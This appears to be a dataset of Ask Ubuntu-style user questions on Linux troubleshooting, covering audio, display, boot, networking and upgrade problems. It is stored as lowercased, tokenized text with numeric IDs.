328217	application should skip the unity launcher	how can i skip the unity launcher for a ( py ) qt-app ? as you see when running the code below , there is an icon in the launcher . i do n't need that icon because i manage the windows of that application by a menu in the unity top panel . i could of course use devilspie and set skip_taskbar , but than i ca n't show the window again after it has been minimized . moreover , i know a gtk-application that works as intended , but in contrast to my application , its gui is generated by an .ui-file . there it is done by < property name=âskip_taskbar_hintâ > false < /property > . i need this in pyqt . import sys from pyqt4.qtgui import qmainwindow , qapplication class myapp ( qmainwindow ) : def __init__ ( self , parent , title ) : super ( qmainwindow , self ) .__init__ ( parent ) self.show ( ) if __name__ == `` __main__ '' : app = qapplication ( sys.argv ) myapp = myapp ( none , `` app '' ) app.exec_ ( ) edit : qt.x11bypasswindowmanagerhint does remove the icon from the launcher , but makes the window always stay on top regardless if qt.windowstaysontophint is set or not . so as a 2nd solution , does anyone know how to fix that ? i guess because x11 is now bypassed , no flag will work .
328221	how to get usb speakers working ?	i am having trouble to get usb speakers ( harman/kardon soundsticks ) working on my asus zenbook running ubuntu 13.04 . when i plug them in , they briefly appear in the sound settings : but after about ten seconds they vanish for no reason , and i see this stuff in the dmesg . [ 261.694063 ] usb 2-1 : new full-speed usb device number 2 using xhci_hcd [ 261.715712 ] usb 2-1 : new usb device found , idvendor=05fc , idproduct=7849 [ 261.715724 ] usb 2-1 : new usb device strings : mfr=3 , product=1 , serialnumber=0 [ 261.715730 ] usb 2-1 : product : soundsticks [ 261.715735 ] usb 2-1 : manufacturer : harman/kardon [ 261.768281 ] usbcore : registered new interface driver usbhid [ 261.768290 ] usbhid : usb hid core driver [ 261.773897 ] usb_audio : warning ! unlikely big volume range ( =656 ) , cval- > res is probably wrong . [ 261.773903 ] usb_audio : [ 2 ] fu [ pcm playback volume ] ch = 2 , val = -10496/0/16 < 6 > [ 261.776375 ] input : harman/kardon soundsticks as /devices/pci0000:00/0000:00:1c.3/0000:03:00.0/usb2/2-1/2-1:1.2/input/input11 [ 261.776646 ] hid-generic 0003:05fc:7849.0001 : input , hidraw0 : usb hid v1.00 device [ harman/kardon soundsticks ] on usb-0000:03:00.0-1/input2 [ 261.779866 ] usbcore : registered new interface driver snd-usb-audio [ 267.807602 ] timeout : still 3 active urbs on ep # 1 [ 268.805848 ] timeout : still 3 active urbs on ep # 1 [ 269.804214 ] timeout : still 3 active urbs on ep # 1 [ 271.804867 ] xhci_hcd 0000:03:00.0 : xhci host not responding to stop endpoint command . [ 271.804884 ] xhci_hcd 0000:03:00.0 : assuming host is dying , halting host . [ 271.804924 ] xhci_hcd 0000:03:00.0 : hc died ; cleaning up [ 271.805011 ] usb 2-1 : usb disconnect , device number 2 [ 274.795747 ] xhci_hcd 0000:03:00.0 : timeout while waiting for configure endpoint command [ 274.795756 ] xhci_hcd 0000:03:00.0 : abort the command ring , but the xhci is dead . [ 274.795765 ] usb 2-1 : not enough bandwidth for altsetting 0 repeated plug and unplugs then do nothing . a fresh reboot will cause the behaviour to reoccur . my kernel version : wim @ wim-zenbook : ~ $ uname -a linux wim-zenbook 3.8.0-27-generic # 40-ubuntu smp tue jul 9 00:17:05 utc 2013 x86_64 x86_64 x86_64 gnu/linux it 's a usb 3.0 port on the zenbook . what do the messages in dmesg mean , and how can i get the speakers to just work properly ?
328223	error installing lubuntu over ubuntu â please help !	i am ( barely ) running ubuntu 10.10 on an ancient laptop . i tried to install lubuntu over it ( and hopefully remove ubuntu ) by running this in the terminal â sudo apt-get install -- no-install-recommends lubuntu-desktop ( which i found in the documentation ) . about 10 minutes of code ran in the terminal and ended with something like this : ( my user name ) ( my pc name ) : $ . this is not the exact final line in the terminal , but it is close . at this point i had no idea what to do to complete the lubuntu installation or close the terminal window . i tried putting in my password and this did nothing , so i rebooted . the result was that ubuntu came up with no sign of lubuntu . what did i do wrong ?
328226	read only problem with usb drive and data loss ?	i encountered a read only file system for my flash drive and i ca n't see my data ( one folder which had all the data is empty ) . i did dosfsck -a /dev/sdf1 ( as i read here ) and now i can write to the us drive . but i ca n't see anywhere my data although the drive shows about `` 3gb used '' , `` 4gb free '' . i have lost my data or there is something to do ? sudo fdisk -l /dev/sdf disk /dev/sdf : 8019 mb , 8019509248 bytes 102 heads , 38 sectors/track , 4041 cylinders , total 15663104 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x04030201 device boot start end blocks id system /dev/sdf1 2192 15663103 7830456 c w95 fat32 ( lba ) ls -la /media/kingston drwx -- -- -- 4 me me 4096 jan 1 1970 . drwxr-xr-x 6 root root 4096 aug 3 17:04 .. drwx -- -- -- 0 me me 0 aug 3 16:44 cc drwx -- -- -- 5 me me 4096 may 11 2012 .trash-1000
328228	minecraft 1.6 crash fix ?	this is what it shows , after i click play the launcher closes and reopens , with the following error : game ended with bad state ( exit code 1 ) ignoring visibility rule and showing launcher due to a game crash deleting /home/user/.minecraft/versions/1.6.2/1.6.2-natives-4212631043739
328240	assign vnc password using script	i am using a script to automatically set up a computer . i need to assign a password to the vnc server for the user , which is normally done using the vncserver command . however , it prompts for the user to enter and re-enter their password , neither of which the script is capable of doing . so , how can i set up the vnc password without an interactive prompt ? thanks .
328244	custom command on active screen event in kde	after upgrading to 13.04 i figured i 'd give kde another try since it 's been a while . one important feature of compiz that i really use is the ability to map arbitrary commands to edge events . i use a wacom tablet and two screens so i had a shell script which swaps the screen that the tablet was mapped to , and made that shell script the command to run when my mouse hit the top edge of the screen . this allows me to very quickly move my tablet pointer from being mapped on the `` left '' screen to being mapped on the `` right '' screen . i would like to do the same in kde but i dont really know how to set up kde . i 've found in settings under system settings - > workspace settings - > screen edges where i can set actions for screen edges . however it does not appear that i can set `` run custom command '' as an action . i also noticed that in system settings - > input devices - > graphic tablet there is the option to map the pad to one screen or the other . i can create two profiles , one for `` mapped left '' and one for `` mapped right '' . is there a way to set `` switch graphic tablet profile '' to a kde workspace screen edge event ? alternatively , is there a way to `` run command '' on kde workspace screen edge event ?
328245	steps to follow to install ubuntu 13.04 on an ultrabook	how exactly should i install ubuntu on my ultrabook so that i can use all my ultrabook hardware at its best ? since , i am new to ubuntu , it will be really helpful if you can elaborate each step . my laptop is dell inspiron 14z ultrabook . i want to install solely ubuntu on it .
328250	i cant boot into ubuntu 13,04 from windows 7	yesterday i installed the iso for ubuntu 13.04 . i put the iso on a flash drive using iso to usb . i am running windows 7 pro and had planned to dual boot ubuntu . i booted up , pressed f12 for booting options , selected my flash drive from ( i believe ) uife , i selected install ubuntu , i went through the setup , i chose to install it alongside windows , selected how much space to give it and windows , and then installed it , but when i rebooted my computer nothing happened and windows 7 proceeded with booting . i tried to reboot and pressed f5 to show options , and 4 ubuntus pop up , and windows 7 pops up . when i selected one of these windows wanted me to install windows ... ... i did not do this . how do i configure ubuntu to boot with windows . system specs : 2.6 ghz i5 mobile processor 4 gigs of ram hd4000 graphics 500 gig hdd my laptop is the dell latitude e5530 any help is appreciated ! thank you .
328262	partition installing ubuntu 13.04	i am installing ubuntu on 250gb space . entire 250gb for ubuntu , i would like to know what would be recommended partition sizes , also couple of terms like logical and primary partition is also what i would like to know . the intended use is for a home desktop ( 4gb ram ) with an towards programming and development . any insights would be really appreciated . ( this may be a repeat question , although i did search the forum , would be really helpful if i could be pointed to the right reference )
328264	headset sound not working	i am running ubuntu 12.04 on a 64 bit dell machine . my speakers are working fine , but my headphone jack just is n't making any sound . i am dual-booting with windows 7 using grub as the boot-loader . the sound is working fine in windows 7 for both headset and speakers . i have a 7.1 surround sound headset and 2 output jacks . neither of these 2 jacks seem to work in ubuntu . the speakers mute like they are supposed to , but there is no sound trough the headset .
328265	trying to enable ipv6 results in a `` no route to host '' error	i 'm configuring a dual stack network on a kvm server using static ipv4 and ipv6 addresses furnished by my provider . i input all addresses , nameservers and gateways as required when installing ubuntu . after that , i checked the /etc/network/interfaces file and noticed that the ipv6 stanza was absent ( an ifconfig execution confirmed this ) , so i added the relevant lines . this is the final file : # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet static address 151.236.18.86 netmask 255.255.255.0 network 151.236.18.0 broadcast 151.236.18.255 gateway 151.236.18.1 # dns-* options are implemented by the resolvconf package , if installed dns-nameservers 91.227.204.227 91.227.205.227 dns-search mydomainname.com iface eth0 inet6 static pre-up modprobe ipv6 address 2001 : b60:1000:151:236:18:86:0 netmask 112 gateway 2001 : b60:1000 : :1 dns-nameservers 2001:4860:4860 : :8888 2001:4860:4860 : :8844 dns-search mydomainname.com i then restarted networking via sudo /etc/init.d/networking stop & & sudo /etc/init.d/networking restart and noticed that , while ipv4 was working , outbound ipv6 connectivity was not available ( i did not check for inbound connectivity yet ) . ifconfig and ip -6 addr show the ipv6 address is recognized : eth0 link encap : ethernet hwaddr 52:54:00 : b1:27:87 inet addr:151.236.18.86 bcast:151.236.18.255 mask:255.255.255.0 inet6 addr : fe80 : :5054 : ff : feb1:2787/64 scope : link inet6 addr : 2001 : b60:1000:151:236:18:86:0/112 scope : global up broadcast running multicast mtu:1500 metric:1 rx packets:16409 errors:0 dropped:0 overruns:0 frame:0 tx packets:1178 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1126656 ( 1.1 mb ) tx bytes:763658 ( 763.6 kb ) 2 : eth0 : < broadcast , multicast , up , lower_up > mtu 1500 qlen 1000 inet6 2001 : b60:1000:151:236:18:86:0/112 scope global valid_lft forever preferred_lft forever inet6 fe80 : :5054 : ff : feb1:2787/64 scope link valid_lft forever preferred_lft forever on the contrary , no default route exists for the ipv6 stack : $ ip -6 route 2001 : b60:1000:151:236:18:86:0/112 dev eth0 proto kernel metric 256 fe80 : :/64 dev eth0 proto kernel metric 256 trying to add the missing route leads to `` no route to host '' error : $ sudo ip -6 route add default via 2001 : b60:1000 : :1 rtnetlink answers : no route to host what could be wrong , and how can i fix the network configuration so that i can get the ipv6 stack working ?
328266	bios update/recognize dvd	i 'm having trouble with my dvd bios . i have to boot from dvd-rom drive , but i ca n't find it . it finds my cd-rw drive , though . does it need an updated bios or something ? iam usuing lubuntu 13.04 . and it can read dvds in lubuntu .
328273	change default icons of particular file types	how can i change the default icons for a particular file extension type , for example , the .tex file ? i have tried with assogiate , but it can not do the job , it seems i am using ubuntu 12.10 with unity desktop manager .
328280	dual-monitor nvidia xorg settings are reset after login	i have a dual-monitor setup using the proprietary nvidia drivers . it appears that the correct settings are used when the os boots ( it appears to be fine at the login prompt ) , but when i login , the settings for my dual montior are reset and the position of the second monitor is incorrect ( it should be set to the right of my main monitor ) . i removed xorg.conf from the /etc/x11 directory and afaik the only one on the system is in /usr/share/x11/xorg.conf.d/12-xorg.conf ( i checked /var/log/xorg.0.log and it says that it is using /usr/share/x11/xorg.conf.d/ ) here are the settings : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 310.14 ( buildd @ aatxe ) tue oct 16 22:21:09 utc 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` dell u2311h '' horizsync 30.0 - 83.0 vertrefresh 56.0 - 76.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 8800 gts 512 '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-0 '' option `` metamodeorientation '' `` crt-1 rightof dfp-0 '' subsection `` display '' depth 24 endsubsection endsection system info : xubuntu 12.04 nvidia proprietary driver version 310.14 x.org x server 1.11.3
328281	something filling my hard disc rapidly	i should have space but really dont have space : code : filesystem 1k-blocks used available use % mounted on /dev/sda6 302247360 302247360 0 100 % / none 4 0 4 0 % /sys/fs/cgroup udev 4005096 4 4005092 1 % /dev tmpfs 804408 1732 802676 1 % /run none 5120 0 5120 0 % /run/lock none 4022040 12 4022028 1 % /run/shm none 102400 8 102392 1 % /run/user /dev/sda1 507904 51464 456440 11 % /boot/efi /home/abc/.private 302247360 302247360 0 100 % /home/abc /dev/sdb1 302247360 302247360 0 100 % /media something is filling my hard disc.today i made a mistake changed the ownership of /usr.then i could not use startx after this change.so used sudo startx.but the system did not see my external hard disc.i tr覺ed to mount it with mount with code : sudo mount -t ntfs /dev/sdb1 /media when it gives the no space error , i tried to unmount this but it says : `` media not mounted '' . i do not know if all these are related with no space issue but maybe there is relation.so what should i do to stop the hard disc filling action ?
328282	grub ( or rather burg ) takes 30 seconds to load	i installed a new drive today in my old computer . i 'm running windows 8 and ubuntu 13.04 using burg as my bootloader . on my old drive grub/burg would load up instantly . however , now that i 've replaced my old one with the new one , the computer just sits at the bios screen for about 30 seconds , and then `` grub loading '' comes up and i 'm good . googling `` grub takes 30 seconds to load '' brought up a bunch of other threads , but their problem was slightly different . in their problems they said that the computer sat at `` grub loading '' for 30 seconds . however , mine does n't even show `` grub loading '' until the end of the 30 seconds . i 'm not sure if this is a problem with grub or a problem with my bios/new drive . furthermore , if i press f12 to go into the boot menu , and choose my hard drive manually there , grub loads up immediately . this is strange cause grub always loaded up immediately on my old drive .
328286	monitor goes to power saving mode with ubuntu 13.04	hello i 'm new to ubuntu and i 've just installed 13.04 on a partition to dual boot with windows 7 . i have a lg flatron 19 ' lcd monitor and several minutes after i have logged in the monitor goes into power saving mode and doesnt come back whatever i do , the system is still running though . i do n't have this problem while i 'm on windows 7 . any help is appreciated .
328288	why can i not see the whole window ?	i have the following problem : my lenovo ideapad s10e runs on ubuntu 12.04 and everytime i open a window it doesn ' show it entirely . meaning : the buttons on the bottom are out of the displays range ( i hope i make myself clear ... ) . i usually solve this problem by resizing the window and then move it up but with the system windows that does n't work which means i can not hit the apply button or such . i read through zillions of posts concerning ubuntu but could n't find a solution . what could be the problem ? the resolution ( which ca n't be changed ) ? the netbooks graphic card or display driver ? i am stumped ...
328291	panel settings do not appear on alt+right-click after installing 12.04	i have tried alt+right-click , super+alt+right-click , 1. alt ( hold ) 2. super ( hold ) 3. right click and many other `` fixes '' found in the askubuntu but none of them work . can anyone help me ?
328292	dozens of ubuntu one conflict files	i work with a drawing program and every ten minutes i store the changes . automatically , besides the drawing file , a backup file.bak is created , or updated , storing the former status . this is the expected behavior . my computer synchronizes the drawing files on ubuntu one . although those were not opened by other computers connected to the same account at the same time , the backup-file produces a file.bak.u1conflict file . after some time of work there are dozens of conflict files in the folder , and i have to delete them manually . why does this happen and how could i solve this ? would it be possible to prevent certain filetypes from being synchronized or delete them automatically ?
328296	problem with newly installed ubuntu 13.04	amd athlon 64x2 dual core processor 2.3 ghz 2gb ram i just installed ubuntu 13.04 on the d : drive which has no other data in it . windows8 is present on the c : drive . ubuntu works fine till the login page . once i enter the password and hit go , the screen starts flickering filled with random lines of orange and brown .
328301	switching from windows 8 to ubuntu . a few questions to ask before hand	i have the microsoft office applications and am wondering if i will still be able to use these . if i want to switch back to windows will i be able to do so ? i have an acer ultrabook with a 30gb ssd . it has a 5 second start up time because of this i am told . will i be able to still have this quick start up time if i use ubuntu ? thanks .
328305	cable unplugged when it 's not	i enter the system and i get `` cable unplugged '' even if it 's not . i can not connect to the internet . how can i solve this ? everything works just fine on windows 7
328306	help needed in passing arguments from command line in bash	# function myfunc myfunc ( ) { echo $ 1 case $ 1 in e ) a=5 ; ; q ) a=10 ; ; esac } myfunc i need help in following : $ myfunc.sh e echo $ 1 is not showing anything . case is also not working . what am i doing wrong ?
328307	how to get lubuntu to autorun the minecraft server script on boot ?	today i am trying to make my server but i have problems when i try to autorun my script . i have followed this tutorial : http : //www.minecraftwiki.net/wiki/tutorials/server_startup_script and the script works when i type /etc/init.d/minecraft start but on boot it does n't wan na start please tell me what to do . if something is needed ask me in comments : ) ps : i can also start the server with sudo service minecraft start
328309	best version of ubuntu to download	i have a question about which ubuntu i am installing . please take a look at this image : to better understand my problem . can someone help me determine which ubuntu i am installing ? i want to download the latest version , which is 12.04 or 12.10 , but i am having difficulties installing ubuntu 12.04 desktop from cd or usb .
328318	upgrading apache open office	i have downloaded the apache openoffice upgrade 4 times . once downloaded a window opens with lists asking me if i want to open a doc or extract it . i highlighted all of the openoffice lines and got a message that they were all extracted . then a window came up asking me where the program could be found . how should i know ? at any rate my apache openoffice is not upgraded and i have no idea how to get the download into the current openoffice program . this is probably basic stuff , but i often download programs that never show up on the desktop bar or desktop so i can use them . my download file has tons of programs i have downloaded and never saw again . some of them have codes instead of names , so i do not recognize them to extract . no matter , i seldom know what to do after the extraction anyway . what do you suppose i am leaving undone ?
328320	unable to mount read-only file system	just bought a brand new external to back up my windows from ubuntu ... since my windows isnt ' accessible anymore ... the hard drive is read only ? i do n't understand how it could be if it 's brand new ? is there anyway to get the os to let me into my new external ... also , i 'm new to ubuntu and am hoping you 'll have simple instructions to get it to work . c : thank you~ update : bad news has come to the windows os . it seems to be stuck in the start up repair loop ... the hard drive is fried at this point .
328321	share files using 12.04	i 'm new to ubuntu . just spent a couple of days overcoming all sorts of minor problems and performing tweaks and downloading apps etc.. having installing 12.04 ( 32 bit ) onto an old xp machine leaving windows in a separate partition for optional booting . basically very impressed with everything . however have just hit a brick wall , ther does not sem to be a simple way of other users accessing each others files . even the music files only seem to be available to the user that downloaded them . surely ubuntu does not require that each user has a complete duplicate copy of the music library . and how do two users have access to a commonly used file that they mutually update . what am i missing ... . ?
328324	how can i turn down the sensitivity of my brightness slider ?	how can i make the brightness change in smaller increments ? i red this before ( how to increase the screen brightness control sensitivity ? ) , but i did n't find the solution to help in my case . my laptop brightness is controlled by vendor specified hotkey ( fn+â & fn+â ) , so there is no interface for os ( ubuntu 12.10 ) to adjust brightness . when i try to adjust , the slider moves by steps of 40 % ( 0-40-80-100 & 100-60-20-0 ) . is there a way to set the steps by 20 % ?
328327	how to use iphone 4s connection for internet in ubuntu 13.04	is it possible to use a iphone 4s 's cell connection for internet in ubuntu 13.04 via the charger cable without jailbreaking ? my internet sometimes gets frustratingly slow and it would be handy to have a second way to get internet . thanks in advance , ~roy .
328330	brightness ca n't be fixed	i have problem with brightness on ubuntu 12.04 . whenever i restart or turn up my hp probook 4515s laptop , brightness is set on the highest level of brightness . please help me to solve this problem : ) i do n't have a problem with brightness on windows 8 .
328336	is there any screen recorder with zoom functionality ?	i have kazam as screen recorder , but it does not have real-time zoom functionality . on youtube , i saw some videos recorded under ubuntu and they are zooming in-out while recording . do you have any suggestions ?
328338	why was grub and ubuntu not installed on the same hard drive ?	with older versions of ubuntu ( 8.x at least ) the bootloader was never installed on the same hard drive as windows , if i chose to install ubuntu to a separate hard drive . i normally have windows on one hard drive and linux on another . note : not different partitions , but different hard drives ! and whenever i needed to boot into linux i would just press f12 on post and choose the hard drive with linux on . that 's it ! but now , with latest ubuntu versions it seems to overwrite the existing windows bootloader , even if ubuntu is installed on another hard drive ? why is that ? and can this be changed when you install ubuntu ? the hard drive with ubuntu on is failing , and it is pretty much paper weight as of now . sometimes it is not identified properly during post and i get to the grub rescue prompt . i get the `` no such device '' error because it awaits the failed hard drive . because of this i was unable to boot into windows . you can see the issue here .
328340	`` /var/run/utmp : no such file or directory '' when using do-release-upgrade	linux newbie here . i recently ordered my first ( unmanaged ) vps running ubuntu 10.04 . i successfully managed to upgrade to 12.04 via ssh connection ( putty ) but have some trouble going to 12.10 release now . this is exactly what i did : sudo apt-get update & & sudo apt-get upgrade & & sudo apt-get dist-upgrade sudo reboot sudo do-release-upgrade -c checking for a new ubuntu release . new release '12.10 ' available . run 'do-release-upgrade ' to upgrade to it . sudo do-release-upgrade after a few seconds the setup process stops because of '/var/run/utmp ' not being found : root @ vm3593 : ~ # sudo do-release-upgrade checking for a new ubuntu release get:1 upgrade tool signature [ 198 b ] get:2 upgrade tool [ 1200 kb ] fetched 1200 kb in 0s ( 0 b/s ) authenticate 'quantal.tar.gz ' against 'quantal.tar.gz.gpg' extracting 'quantal.tar.gz' /var/run/utmp : no such file or directory so i tried : cd / sudo cat /dev/null > /var/run/utmp sudo reboot and it fixed the missing file issue ( yay ! ) . unfortunately , the setup still gets stuck with the following error ( s ) : file '' /tmp/update-manager-zddbe2/distupgrade/distupgradecontroller.py '' , line 1616 , in fullupgrade if not self.prepare ( ) : file '' /tmp/update-manager-zddbe2/distupgrade/distupgradecontroller.py '' , line 429 , in prepare self._sshmagic ( ) file '' /tmp/update-manager-zddbe2/distupgrade/distupgradecontroller.py '' , line 299 , in _sshmagic '' do you want to continue ? '' ) % port ) file `` /tmp/update-manager-zddbe2/distupgrade/distupgradeviewtext.py '' , line 216 , in askyesnoquestion res = sys.stdin.readline ( ) .decode ( encoding , `` backslashreplace '' ) typeerror : decode ( ) argument 1 must be string , not none === command detached from window ( sat aug 3 20:26:10 2013 ) === === command terminated with exit status 1 ( sat aug 3 20:26:10 2013 ) === what can i do ? please keep in mind that i 'm absolutely new to this .
328342	total noob here . just installed 13.04 and it does n't recognize my second monitor	i click detect displays but it does n't recognize my second monitor . i only see the main one . my graphics card is a geforce 9800 gt . thanks
328343	how to compile/build and run objective-c program in ubuntu using terminal ?	so here i have the basic `` hello world '' script for objective-c , i have ubuntu on my laptop and want to use ubuntu to start compiling basic ideas , extra classes , or anything worth coding for any of my current projects on the go , so that way i can code a little bit wherever i am and not always have to be on my imac . now my only question is how do i build and run this code in terminal ? obviously it 's not that important since i 'm coding for ios and osx so the only code that will display is anything that does n't call on the sdk 's or cocoa scripts , so basically it should only display basic text commands such as `` nslog '' or whatever , you get the just of what i 'm trying to do , which is what i want . that way i can check for small errors at the very least . i 've looked around and i 've found several helps for default shell scripts and such that call on the gcc directory or something of the sort from my understanding . i have created my own folder for objective-c projects located in my documents and i had no idea if that is effecting my ability to run the file using the terminal commands that i 've tried or not , but in case it is i store the projects in : home > documents > objective-c > helloworld.m also when running the command line : gcc -o helloworld.m or this gcc -i/home/caseyerdmann/documents/objective-c/helloworld.m or any version of that command line i receive this error : gcc : fatal error : no input files compilation terminated . i believe i have all the compiler files installed but i am not opposed to a full tutorial , whatever gets this running . now to clarify and gather a visual aid for you guys to try and help me better my text file is located in my documents : and you can visually see the directory it is placed in . now when i run any of the commands above that i have tried in terminal it yields this result : it does n't matter which command i use it is always that . i hope this helps a little bit more to provide an answer for my situation . i am not opposed to a full tutorial and having to save my file elsewhere or make any other changes by any means , in fact it 'd be appreciated ! i just would love to get this running . i did some research and noticed the answers on this already are providing me with help to run the hello.m script that comes inside the gnustep libraries , this is not what i am trying to do . however because i 'm having trouble getting the default script to run i think i may have another problem as well , i 'm going to continue researching to see if i can get that script to run , in the mean time any help is appreciated ! update : i have tried a new command and yielded a new result , though it was also unsuccessful in compiling i think it may help answer others to answer this . this is what i tried : gcc -o helloworld.m -lobjc and this was the result : /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../x86_64-linux-gnu/crt1.o : in function _start ' : ( .text+0x20 ) : undefined reference tomain' collect2 : ld returned 1 exit status thank you !
328351	windows 8 boot from grub broken after apt-get upgrade	i have been running windows 8 on a different partition , alongside ubuntu 12.04 , working fine . after running sudo apt-get upgrade the windows 8 partition ca n't boot . i can still see windows 8 ( on dev/sda3 , which is correct ) in the grub menu , but when selected i see a black screen flash and the grub menu reappears within a couple of seconds . i tried repairing with boot-repair which has always solved my grub issues , but this time it changes nothing . fwiw here is a bootsummary http : //paste.ubuntu.com/5945338
328356	problems dvd playback in ubuntu 12.04	i have followed : ubuntu 10.04 ( i386 , amd64 ) , 10.10 , 11.04 , 11.10 , 12.04 , and 12.10 ( i386 , amd64 ) works for old releases that are no longer supported if you have repositories on cd/dbd or somewhere . so anything from 9.04 onwards . the last lts , 10.04 , worked this way . the current lts , 12.04 and the recent 12.10 also work this way . install the libdvdread4 package ( no need to add third party repositories ) via synaptic or command line : ( note : if you have installed *ubuntu-restricted-extras this has already been installed automatically for you ) sudo apt-get install libdvdread4 then open a terminal window and execute : sudo /usr/share/doc/libdvdread4/install-css.sh rebooting may be necessary . after this , vlc will automatically use it . some programs may need recompilation . '' the dvd plays but then starts to lag the freezes so i have looked at various dma forums but have had no joy . one forum stated providing the following readings below : sudo hdparm -tt /dev/sda timing cached reads : 1648 mb in 2.00 seconds = 823.64 mb/sec timing buffered disk reads : 330 mb in 3.01 seconds = 109.79 mb/sec desktop : ~ $ sudo dmesg |grep dma [ 0.000000 ] dma 0x00000010 - > 0x00001000 [ 0.000000 ] dma zone : 32 pages used for memmap [ 0.000000 ] dma zone : 0 pages reserved [ 0.000000 ] dma zone : 3951 pages , lifo batch:0 [ 0.697396 ] ata1 : pata max udma/100 cmd 0x1f0 ctl 0x3f6 bmdma 0xffa0 irq 14 [ 0.697399 ] ata2 : pata max udma/100 cmd 0x170 ctl 0x376 bmdma 0xffa8 irq 15 [ 0.698873 ] ata3 : sata max udma/133 cmd 0xd080 ctl 0xd000 bmdma 0xc800 irq 19 [ 0.698876 ] ata4 : sata max udma/133 cmd 0xcc00 ctl 0xc880 bmdma 0xc808 irq 19 [ 0.876354 ] ata1.00 : atapi : hl-dt-st dvdram gsa-4163b , a102 , max udma/33 [ 0.876538 ] ata3.00 : ata-8 : st3500418as , cc38 , max udma/133 [ 0.892236 ] ata1.00 : configured for udma/33 [ 0.892422 ] ata3.00 : configured for udma/133 [ 7.557326 ] parport0 : pc-style at 0x378 ( 0x778 ) , irq 7 , dma 3 [ pcspp , tristate , compat , ecp , dma ] any ideas would be appreciated !
328362	wireless on acer aspire one & ubuntu 13.04	i 'm really new to ubuntu , used it only a little 5 or so years ago and remember having wifi obstacles then too . i bought a crappy acer aspire one netbook recently that came with ubuntu on it , ethernet works fine and i tried installing some wireless stuff from the software center and uninstalled it after a friend told me the wireless driver for the netbook i have is different . did some searching ... i do n't know what to do ... i feel so dumb and helpless .
328363	starting from hibernate switches off the computer	since a batch of upates installed a few weeks ago , when the system starts from hibernation , after reading the saved hibernation state , on reaching the point that it switches to graphical mode , the computer powers off . it changes back to text mode and does what looks like a fast , but controlled , linux shutdown and the computer switches off . when it is started again the system boots normally ( i.e . hibernation state lost/ignored . ) i 'm at a loss diagnosing this problem . i 've looked into system.log , pm-suspend.log , dmesg ... without seeing a trace of what happened on the de-hibernation process . i came here looking for advice on how to investigate this . if there is a more appropriate forum , please tell me . the main suspects on the list of upgraded packages are libdrm , libkms and libc . it also upgraded qt and the kernel , but since the update the problem also happens with the old kernel , so i discarded the kernel as the probable cause . suspend to ram works fine . i 'm on kubuntu 13.04 amd64 .
328364	/bin/sh is a symbolic link that does n't point to /bin/bash	i was installing the software environment of armadeus experiment board apf27dev , and when i tried the make command , it gave me the following error message : on your system /bin/sh is a symbolic link that does n't point to /bin/bash -- > please correct that ! lrwxrwxrwx 1 root root 4 2013-08-03 20:57 /bin/sh - > dash to resolve this error , i 've tried to change all the shebangs from # ! /bin/sh to # ! /bin/bash , and i 've also tried the following command line : ln -s /bin/bash /bin/sh but , all that i 've done did n't resolve the problem . could anyone please help me out with this problem ?
328372	do i have to upgrade to 13.04 to use latest ati driver	my question : must we following the release each time it just comes out , to use latest application and drivers . firstly i use ubuntu on an old laptop and happy with it . i understand new release is better suitable for better hw , ram etc ; secondly on ubuntu 11.10 , 12.04 , 12.10 there were issues i have spent a long time to fix for ati driver , for internet connection etc . the speed result is still not better compared to 11.04 . no , i am not looking for any fix . i just want to know : i like to use latest graphic driver ati on the desktop pc , can i stick with ubuntu 11.04 ? how can i upgrade application security without moving up from the stable 11.04 ubuntu system ?
328373	13.04 cssm tweak broke compiz and unity : how to recover	i was trying to setup my desktop with the right 270 pixels reserved for conky as mentioned here when i was tweaking the general settings in cssm unity reset itself and stopped responding to mouse clicks . all the fonts also became un-antialiased..this was before i even quit ccsm . the mouse could no longer click on the cssm window and quit without saving . when i logged out and logged back in , the fonts were all messed up , the unity sidebar had dissapeared and everything was off . the mouse continued to not be able to click on a ccsm window . i did the following to try and recover installed dconf tools sudo dconf -f reset /org/compiz that did not fix the problem i then purged unity and compiz and reinstalled them sudo apt-get install -- reinstall ubuntu-dekstop sudo apt-get purge unity sudo apt-get install unity sudo apt-get purge compiz sudo apt-get install compiz now when i log in as myself , the sidebar and top bar are missing . when i run unity -- replace , for a brief instant the screens looks antialiased and nice and then everything goes back to ugly . when i log in as guest , everything looks normal . how can i recover from this state .
328379	graphics card error on dual boot with windows 7	so i dual-booted with windows 7 and this is my first time ever using ubuntu . as soon as i start ubuntu it gives me this image and i do n't understand what is happening . i think this a graphics card error , it works on windows 7 . also it occasionaly gives me an option to run graphics in low settings . i do it but it still does n't work , i usually just get a purple screen with black and green bars . i have a custom computer : nvidia gtx 760 intel core i5 4670k gigabyte z87-hd3 motherboard i also have 2 hard drives and the ssd is for windows and the 1 tb wd is for ubuntu . i partitioned it so only about 150 gb are for ubuntu .
328388	ram doubled from 8 gb to 16 gb , now ubuntu 13.04 is so slow !	i upgraded my ram amount from 8 gb to 16 gb tonight . after the upgrade ubuntu takes forever to boot and doing anything on the os is hideously slow now . you can click on a menu and it will take minutes to come up . with 8gb it ran fine , with 16gb it is super slow . would anyone know if there is anything you can do to get ubuntu to run properly again with more ram ?
